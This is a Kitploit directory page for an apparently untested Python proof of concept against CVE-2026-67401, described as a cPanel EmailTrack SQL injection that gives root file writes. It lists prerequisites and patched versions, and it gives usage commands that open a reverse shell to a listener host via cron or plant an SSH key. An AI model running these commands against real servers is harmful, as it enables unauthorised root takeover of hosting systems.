Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-67401 — Python proof-of-concept for CVE-2026-67401, an authenticated SQL injection in cPanel EmailTrack that allows arbitrary file write as root via SQLite ATTACH DATABASE, enabling reverse shell or SSH key drop. | Kitploit
Tools/GitHubGitHub/axedos/cve-2026-67401
Privilege EscalationExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Python proof-of-concept for CVE-2026-67401, an authenticated SQL injection in cPanel EmailTrack that allows arbitrary file write as root via SQLite ATTACH DATABASE, enabling reverse shell or SSH key drop.

View Repository
16h 13m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-67401

SQL injection in cPanel EmailTrack. Authenticated cPanel user with mail privileges writes arbitrary files as root via SQLite ATTACH DATABASE. One request to root. Haven't tested on a real target, code is only put together from public information and basic diff'ing. Do your due diligence as a researcher and try it and send PR fixes.

Affects all cPanel/WHM builds before Sep 8 2026 patch.

What should be present

  • Valid cPanel account with mail privileges on the target server
  • Python 3, requests library
  • A listener if using the reverse shell payload

How to use it

root@kitploit:~
# Reverse shell via cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# SSH key drop
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# Existing session
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# Dry run (print request, don't send)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

FIXES

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
Download Tool